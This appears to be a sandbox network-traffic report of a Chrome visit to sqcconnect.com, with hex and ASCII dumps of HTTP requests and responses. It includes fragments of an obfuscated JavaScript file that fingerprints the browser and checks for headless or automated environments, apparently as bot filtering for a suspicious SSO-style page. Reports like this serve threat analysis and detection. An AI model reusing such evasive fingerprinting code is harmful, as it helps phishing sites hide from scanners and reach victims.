                                        2024-12-17 14:46:14 UTC8000INData Raw: 30 36 29 3b 20 65 6c 73 65 20 7b 20 69 66 20 28 5f 30 78 35 31 39 64 38 65 28 30 78 31 37 31 29 20 21 3d 3d 20 5f 30 78 35 31 39 64 38 65 28 30 78 31 37 31 29 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 32 37 30 35 31 37 20 3d 20 5f 30 78 31 34 64 34 33 32 5b 5f 30 78 35 38 61 39 33 34 28 30 78 32 63 64 29 5d 28 5f 30 78 31 64 39 61 64 34 2c 20 61 72 67 75 6d 65 6e 74 73 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 34 31 30 34 62 31 20 3d 20 6e 75 6c 6c 2c 20 5f 30 78 32 37 30 35 31 37 3b 20 7d 20 65 6c 73 65 20 7b 20 69 66 20 28 5f 30 78 34 34 61 35 39 66 5b 5f 30 78 35 65 37 33 31 62 28 30 78 32 38 34 29 5d 28 2f 66 69 72 65 66 6f 78 7c 66 78 69 6f 73 2f 69 29 29 20 5f 30 78 34 30 35 63 36 39 20 3d 20 5f 30 78 35 31 39 64 38 65 28 30 78 31 37 64 29 3b 20 65 6c 73
                                        Data Ascii: 06); else { if (_0x519d8e(0x171) !== _0x519d8e(0x171)) { const _0x270517 = _0x14d432[_0x58a934(0x2cd)](_0x1d9ad4, arguments); return _0x4104b1 = null, _0x270517; } else { if (_0x44a59f[_0x5e731b(0x284)](/firefox|fxios/i)) _0x405c69 = _0x519d8e(0x17d); els
                                        2024-12-17 14:46:14 UTC8000INData Raw: 52 62 27 20 21 3d 3d 20 5f 30 78 32 31 63 39 32 61 28 30 78 32 34 33 29 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 34 65 62 37 32 31 20 3d 20 5f 30 78 31 66 66 34 62 33 5b 5f 30 78 33 63 65 38 34 30 28 30 78 32 63 36 29 5d 28 5f 30 78 32 33 33 30 39 36 20 3d 3e 20 5f 30 78 32 33 33 30 39 36 5b 5f 30 78 32 31 63 39 32 61 28 30 78 31 39 32 29 5d 29 5b 5f 30 78 33 64 65 63 64 35 28 30 78 32 35 32 29 5d 28 5f 30 78 35 63 37 63 37 38 20 3d 3e 20 28 7b 20 27 6e 61 6d 65 27 3a 20 5f 30 78 35 63 37 63 37 38 5b 5f 30 78 32 63 63 31 33 62 28 30 78 32 38 66 29 5d 2c 20 27 6c 61 6e 67 27 3a 20 5f 30 78 35 63 37 63 37 38 5b 5f 30 78 33 35 61 37 33 66 28 30 78 32 61 30 29 5d 2c 20 27 64 65 66 61 75 6c 74 27 3a 20 5f 30 78 35 63 37 63 37 38 5b 5f 30 78 32 31 63 39 32 61 28
                                        Data Ascii: Rb' !== _0x21c92a(0x243)) { const _0x4eb721 = _0x1ff4b3[_0x3ce840(0x2c6)](_0x233096 => _0x233096[_0x21c92a(0x192)])[_0x3decd5(0x252)](_0x5c7c78 => ({ 'name': _0x5c7c78[_0x2cc13b(0x28f)], 'lang': _0x5c7c78[_0x35a73f(0x2a0)], 'default': _0x5c7c78[_0x21c92a(
                                        2024-12-17 14:46:14 UTC8000INData Raw: 63 28 30 78 31 37 36 29 20 21 3d 3d 20 5f 30 78 35 63 37 35 36 63 28 30 78 31 37 36 29 20 3f 20 5f 30 78 32 33 30 38 63 38 28 74 68 69 73 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 36 38 36 61 38 62 20 3d 20 5f 30 78 35 61 62 36 62 34 2c 20 5f 30 78 61 63 31 63 36 31 20 3d 20 6e 65 77 20 5f 30 78 31 31 32 66 66 65 28 5f 30 78 36 38 36 61 38 62 28 30 78 32 35 35 29 20 2b 20 27 5c 78 35 63 28 5c 78 32 30 2a 5c 78 35 63 29 27 29 2c 20 5f 30 78 32 62 34 64 33 36 20 3d 20 6e 65 77 20 5f 30 78 35 39 39 62 64 64 28 5f 30 78 36 38 36 61 38 62 28 30 78 32 37 34 29 20 2b 20 5f 30 78 36 38 36 61 38 62 28 30 78 32 62 30 29 20 2b 20 5f 30 78 36 38 36 61 38 62 28 30 78 32 31 34 29 20 2b 20 5f 30 78 36 38 36 61 38 62 28 30 78 32 33 64 29
                                        Data Ascii: c(0x176) !== _0x5c756c(0x176) ? _0x2308c8(this, function () { const _0x686a8b = _0x5ab6b4, _0xac1c61 = new _0x112ffe(_0x686a8b(0x255) + '\x5c(\x20*\x5c)'), _0x2b4d36 = new _0x599bdd(_0x686a8b(0x274) + _0x686a8b(0x2b0) + _0x686a8b(0x214) + _0x686a8b(0x23d)
                                        2024-12-17 14:46:14 UTC1796INData Raw: 75 72 6e 20 5f 30 78 32 64 31 30 66 36 3b 20 65 6c 73 65 20 7b 20 63 6f 6e 73 74 20 5f 30 78 34 31 32 34 39 38 20 3d 20 5b 5f 30 78 32 30 65 61 66 66 28 30 78 32 30 39 29 20 2b 20 27 6d 27 20 69 6e 20 5f 30 78 35 37 38 37 64 36 2c 20 27 5f 70 68 61 6e 74 6f 6d 27 20 69 6e 20 5f 30 78 34 34 65 31 38 63 2c 20 5f 30 78 32 30 35 62 35 34 28 30 78 32 31 30 29 20 69 6e 20 5f 30 78 35 30 36 30 39 64 2c 20 5f 30 78 35 38 35 39 66 31 28 30 78 32 34 37 29 20 69 6e 20 5f 30 78 38 31 63 65 35 35 2c 20 5f 30 78 35 33 34 66 33 64 28 30 78 32 38 64 29 20 2b 20 5f 30 78 35 33 65 64 30 30 28 30 78 32 31 31 29 20 69 6e 20 5f 30 78 32 66 34 37 37 64 2c 20 5f 30 78 39 37 31 62 37 28 30 78 32 36 64 29 20 2b 20 5f 30 78 33 32 36 34 32 33 28 30 78 32 64 37 29 20 2b 20 5f 30 78
                                        Data Ascii: urn _0x2d10f6; else { const _0x412498 = [_0x20eaff(0x209) + 'm' in _0x5787d6, '_phantom' in _0x44e18c, _0x205b54(0x210) in _0x50609d, _0x5859f1(0x247) in _0x81ce55, _0x534f3d(0x28d) + _0x53ed00(0x211) in _0x2f477d, _0x971b7(0x26d) + _0x326423(0x2d7) + _0x


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.1749729103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:13 UTC780OUTGET /editor/f.js HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://sqcconnect.com/editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
                                        2024-12-17 14:46:14 UTC213INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:13 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 17 Dec 2024 12:26:55 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 53997
                                        Connection: close
                                        Content-Type: text/javascript
                                        2024-12-17 14:46:14 UTC7979INData Raw: 63 6f 6e 73 74 20 61 30 5f 30 78 63 65 31 31 61 3d 61 30 5f 30 78 32 35 66 32 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 31 35 31 35 2c 5f 30 78 31 38 66 62 64 34 29 7b 63 6f 6e 73 74 20 5f 30 78 36 33 62 61 64 63 3d 61 30 5f 30 78 32 35 66 32 2c 5f 30 78 32 65 34 36 61 66 3d 5f 30 78 33 61 31 35 31 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 65 34 62 35 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 62 61 64 63 28 30 78 31 63 37 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 62 61 64 63 28 30 78 31 31 39 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 62 61 64 63 28 30 78 31 66 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 62 61 64 63 28
                                        Data Ascii: const a0_0xce11a=a0_0x25f2;(function(_0x3a1515,_0x18fbd4){const _0x63badc=a0_0x25f2,_0x2e46af=_0x3a1515();while(!![]){try{const _0x5e4b53=-parseInt(_0x63badc(0x1c7))/0x1*(-parseInt(_0x63badc(0x119))/0x2)+parseInt(_0x63badc(0x1fb))/0x3+-parseInt(_0x63badc(
                                        2024-12-17 14:46:14 UTC8000INData Raw: 28 30 78 31 33 64 29 29 5b 5f 30 78 35 36 61 33 33 34 28 30 78 31 63 65 29 5d 28 5f 30 78 31 66 32 35 36 39 28 30 78 31 62 66 29 29 3a 41 72 72 61 79 5b 5f 30 78 31 66 32 35 36 39 28 30 78 32 30 36 29 5d 28 6e 61 76 69 67 61 74 6f 72 5b 5f 30 78 31 66 32 35 36 39 28 30 78 32 35 30 29 5d 29 5b 5f 30 78 31 66 32 35 36 39 28 30 78 31 65 65 29 5d 28 5f 30 78 34 34 66 36 61 35 3d 3e 28 7b 27 74 79 70 65 27 3a 5f 30 78 34 34 66 36 61 35 5b 5f 30 78 31 66 32 35 36 39 28 30 78 31 66 30 29 5d 2c 27 64 65 73 63 72 69 70 74 69 6f 6e 27 3a 5f 30 78 34 34 66 36 61 35 5b 5f 30 78 31 66 32 35 36 39 28 30 78 32 61 38 29 2b 27 6e 27 5d 2c 27 73 75 66 66 69 78 65 73 27 3a 5f 30 78 34 34 66 36 61 35 5b 5f 30 78 31 66 32 35 36 39 28 30 78 31 65 39 29 5d 7d 29 29 3b 7d 63 61
                                        Data Ascii: (0x13d))[_0x56a334(0x1ce)](_0x1f2569(0x1bf)):Array[_0x1f2569(0x206)](navigator[_0x1f2569(0x250)])[_0x1f2569(0x1ee)](_0x44f6a5=>({'type':_0x44f6a5[_0x1f2569(0x1f0)],'description':_0x44f6a5[_0x1f2569(0x2a8)+'n'],'suffixes':_0x44f6a5[_0x1f2569(0x1e9)]}));}ca
                                        2024-12-17 14:46:14 UTC8000INData Raw: 28 30 78 32 62 63 29 2c 5f 30 78 35 64 37 66 63 61 28 30 78 31 36 30 29 2b 5f 30 78 35 64 37 66 63 61 28 30 78 65 33 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 31 63 37 29 2b 27 4d 53 27 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 37 34 29 2c 5f 30 78 35 64 37 66 63 61 28 30 78 65 39 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 61 30 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 35 35 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 31 63 38 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 35 34 29 2c 5f 30 78 35 64 37 66 63 61 28 30 78 31 61 34 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 32 30 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 32 38 29 2b 27 75 61 27 2c 5f 30 78 35 64 37 66 63 61 28 30 78 66 64 29 2b 5f 30 78 32 34 39 33 33 62 28 30 78 32 62 64 29 2c 5f 30
                                        Data Ascii: (0x2bc),_0x5d7fca(0x160)+_0x5d7fca(0xe3),_0x24933b(0x1c7)+'MS',_0x24933b(0x274),_0x5d7fca(0xe9),_0x24933b(0x2a0),_0x24933b(0x255),_0x24933b(0x1c8),_0x24933b(0x254),_0x5d7fca(0x1a4),_0x24933b(0x220),_0x24933b(0x228)+'ua',_0x5d7fca(0xfd)+_0x24933b(0x2bd),_0
                                        2024-12-17 14:46:14 UTC8000INData Raw: 50 54 48 5f 42 49 54 53 27 3a 5f 30 78 35 65 32 33 31 62 5b 5f 30 78 34 32 63 36 62 36 28 30 78 31 66 31 29 2b 27 65 72 27 5d 28 5f 30 78 35 65 32 33 31 62 5b 5f 30 78 32 62 31 36 63 64 28 30 78 32 37 38 29 5d 29 2c 27 53 54 45 4e 43 49 4c 5f 42 49 54 53 27 3a 5f 30 78 35 65 32 33 31 62 5b 5f 30 78 32 62 31 36 63 64 28 30 78 32 37 35 29 2b 27 65 72 27 5d 28 5f 30 78 35 65 32 33 31 62 5b 5f 30 78 32 62 31 36 63 64 28 30 78 32 37 64 29 2b 27 54 53 27 5d 29 7d 7d 3b 72 65 74 75 72 6e 20 5f 30 78 33 35 37 63 63 33 3b 7d 63 61 74 63 68 28 5f 30 78 34 31 37 61 32 65 29 7b 69 66 28 5f 30 78 34 32 63 36 62 36 28 30 78 31 37 66 29 21 3d 3d 5f 30 78 32 62 31 36 63 64 28 30 78 32 33 61 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 65 6c 73 65 20 5f 30 78 31 33 35 32 36
                                        Data Ascii: PTH_BITS':_0x5e231b[_0x42c6b6(0x1f1)+'er'](_0x5e231b[_0x2b16cd(0x278)]),'STENCIL_BITS':_0x5e231b[_0x2b16cd(0x275)+'er'](_0x5e231b[_0x2b16cd(0x27d)+'TS'])}};return _0x357cc3;}catch(_0x417a2e){if(_0x42c6b6(0x17f)!==_0x2b16cd(0x23a))return null;else _0x13526
                                        2024-12-17 14:46:14 UTC8000INData Raw: 66 64 20 6f 66 20 5f 30 78 34 39 62 64 36 63 29 7b 5f 30 78 32 38 66 30 64 30 5b 5f 30 78 33 30 61 64 37 38 28 30 78 32 38 66 29 5d 5b 5f 30 78 35 39 34 32 39 62 28 30 78 32 36 36 29 5d 3d 5f 30 78 32 62 65 64 65 32 2b 27 2c 27 2b 5f 30 78 34 39 38 62 66 64 2c 5f 30 78 33 63 35 32 31 31 5b 5f 30 78 32 32 31 37 66 66 28 30 78 31 34 38 29 2b 27 64 27 5d 28 5f 30 78 35 39 38 35 32 37 29 3b 63 6f 6e 73 74 20 5f 30 78 35 37 65 30 65 33 3d 5f 30 78 32 37 36 62 38 39 5b 5f 30 78 34 34 31 62 37 32 28 30 78 32 37 62 29 2b 27 68 27 5d 21 3d 3d 5f 30 78 34 37 61 31 66 34 5b 5f 30 78 34 39 38 62 66 64 5d 7c 7c 5f 30 78 34 39 32 30 64 61 5b 5f 30 78 32 32 31 37 66 66 28 30 78 31 35 35 29 2b 27 68 74 27 5d 21 3d 3d 5f 30 78 35 37 39 38 32 64 5b 5f 30 78 34 39 38 62 66
                                        Data Ascii: fd of _0x49bd6c){_0x28f0d0[_0x30ad78(0x28f)][_0x59429b(0x266)]=_0x2bede2+','+_0x498bfd,_0x3c5211[_0x2217ff(0x148)+'d'](_0x598527);const _0x57e0e3=_0x276b89[_0x441b72(0x27b)+'h']!==_0x47a1f4[_0x498bfd]||_0x4920da[_0x2217ff(0x155)+'ht']!==_0x57982d[_0x498bf
                                        2024-12-17 14:46:14 UTC8000INData Raw: 21 3d 3d 5f 30 78 31 39 62 37 38 66 28 30 78 32 33 61 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 65 6c 73 65 20 5f 30 78 34 37 64 37 32 63 28 27 30 27 29 3b 7d 7d 7d 7d 65 6c 73 65 7b 69 66 28 28 27 27 2b 5f 30 78 33 64 37 37 33 61 2f 5f 30 78 33 64 37 37 33 61 29 5b 5f 30 78 35 33 61 33 63 39 28 30 78 32 34 65 29 5d 21 3d 3d 30 78 31 7c 7c 5f 30 78 33 64 37 37 33 61 25 30 78 31 34 3d 3d 3d 30 78 30 29 7b 69 66 28 27 4d 51 43 74 53 27 3d 3d 3d 5f 30 78 35 33 61 33 63 39 28 30 78 31 65 37 29 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 36 30 37 31 35 3d 5f 30 78 31 31 38 63 34 35 3b 69 66 28 5f 30 78 35 36 30 37 31 35 28 30 78 31 34 36 29 21 3d 3d 27 57 76 4a 70 76 27 29 7b 5f 30 78 34 64 35 62 63 36 5b 5f 30 78 34 62 65 34 38 62 28
                                        Data Ascii: !==_0x19b78f(0x23a))return null;else _0x47d72c('0');}}}}else{if((''+_0x3d773a/_0x3d773a)[_0x53a3c9(0x24e)]!==0x1||_0x3d773a%0x14===0x0){if('MQCtS'===_0x53a3c9(0x1e7))(function(){const _0x560715=_0x118c45;if(_0x560715(0x146)!=='WvJpv'){_0x4d5bc6[_0x4be48b(
                                        2024-12-17 14:46:14 UTC6018INData Raw: 64 66 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 30 35 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 38 32 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 33 61 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 34 34 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 65 35 29 2c 27 38 34 39 30 30 77 43 45 4d 58 27 2b 27 49 27 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 39 36 29 2c 27 42 4c 55 45 5f 42 49 54 53 27 2c 5f 30 78 35 34 37 66 37 63 28 30 78 66 62 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 39 63 29 2c 27 70 61 72 73 65 5c 78 32 30 73 65 72 76 27 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 63 63 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 62 36 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 63 65 29 2c 27 4f 66 41 66 6a 27 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31
                                        Data Ascii: df),_0x547f7c(0x105),_0x547f7c(0x182),_0x547f7c(0x13a),_0x547f7c(0x144),_0x547f7c(0x1e5),'84900wCEMX'+'I',_0x547f7c(0x196),'BLUE_BITS',_0x547f7c(0xfb),_0x547f7c(0x19c),'parse\x20serv',_0x547f7c(0x1cc),_0x547f7c(0x1b6),_0x547f7c(0xce),'OfAfj',_0x547f7c(0x1


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.1749732104.18.95.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:16 UTC794OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/kt8az/0x4AAAAAAA0Aa6igGlTE6pvw/auto/fbE/normal/auto/ HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: iframe
                                        Referer: https://sqcconnect.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:16 UTC1362INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 26806
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                        cross-origin-embedder-policy: require-corp
                                        cross-origin-opener-policy: same-origin
                                        cross-origin-resource-policy: cross-origin
                                        origin-agent-cluster: ?1
                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        referrer-policy: same-origin
                                        document-policy: js-profiling
                                        2024-12-17 14:46:16 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 33 37 62 33 61 33 32 64 32 64 34 33 38 37 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                        Data Ascii: Server: cloudflareCF-RAY: 8f37b3a32d2d4387-EWRalt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:46:16 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                        2024-12-17 14:46:16 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                        2024-12-17 14:46:16 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                        2024-12-17 14:46:16 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                        2024-12-17 14:46:16 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
